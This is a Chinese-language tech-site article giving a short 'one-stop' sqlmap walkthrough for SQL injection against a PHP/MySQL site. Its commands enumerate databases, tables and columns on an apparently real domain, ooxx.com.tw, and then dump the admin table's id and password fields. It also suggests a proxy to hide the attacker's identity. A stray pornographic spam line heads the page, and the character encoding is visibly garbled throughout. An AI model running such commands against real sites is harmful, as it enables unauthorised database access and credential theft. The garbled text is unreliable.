自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

sqlmap注入常見用法一條龍

安全 數(shù)據(jù)安全
sqlmap是一個(gè)灰常強(qiáng)大的sql注入檢測(cè)與輔助工具,但是由于沒有圖形界面,基本上用起來比較麻煩,導(dǎo)致很多人可能寧愿用havij或者是pangolin也不愿意麻煩去翻幫助界面,其實(shí)真正用起來也就5,6句,也不會(huì)太復(fù)雜。

sqlmap是一個(gè)灰常強(qiáng)大的sql注入檢測(cè)與輔助工具,但是由于沒有圖形界面,基本上用起來比較麻煩,導(dǎo)致很多人可能寧愿用havij或者是pangolin也不愿意麻煩去翻幫助界面,我自己也是把很多語句貼到了一個(gè)記事本里面用,其實(shí)真正用起來也就5,6句,也不會(huì)太復(fù)雜,下文以php+mysql為例:

檢查注入點(diǎn)sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列數(shù)據(jù)庫信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定庫名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定庫名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定庫名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有幾個(gè)參數(shù)可能會(huì)用到,直接加在***面就可以了,更多詳細(xì)參數(shù)見官方文檔:

--cookie=COOKIE 在需要登錄的地方,需要登錄后的cookie

--proxy="http://127.0.0.1:8087" 使用HTTP代理隱藏自己的身份,比如使用goagent等

--sql-query=QUERY 執(zhí)行一個(gè)sql語句,不一定支持

過程的幾張圖如下:

sqlmap注入常見用法一條龍

sqlmap注入常見用法一條龍

sqlmap注入常見用法一條龍

 

責(zé)任編輯:藍(lán)雨淚 來源: 博客
相關(guān)推薦

2012-11-08 14:28:16

2013-12-27 09:00:27

編程語言

2011-05-24 16:04:34

打印機(jī)技巧

2011-06-17 15:16:46

打印機(jī)技巧

2021-12-28 10:51:32

自動(dòng)駕駛技術(shù)安全

2025-04-27 00:00:00

Milvus向量數(shù)據(jù)庫AI

2020-06-10 16:32:43

百度谷歌老照片修復(fù)

2020-04-20 17:16:58

Python數(shù)據(jù)處理

2022-12-31 18:22:23

2020-07-16 13:00:18

人工智能機(jī)器學(xué)習(xí)技術(shù)

2020-07-20 09:49:56

開源技術(shù) 趨勢(shì)

2021-08-27 10:04:53

機(jī)器人

2013-06-27 10:26:53

Sqlmap注入

2020-04-17 14:16:10

SQL數(shù)據(jù)庫HTTP

2022-10-25 14:01:46

AI游戲

2024-11-26 14:00:00

AI代碼

2022-07-13 08:49:27

DevOpsKubeSphere

2024-09-09 14:50:00

數(shù)據(jù)訓(xùn)練

2015-03-25 19:15:08

2022-12-02 17:37:57

AIOpenAI游戲
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)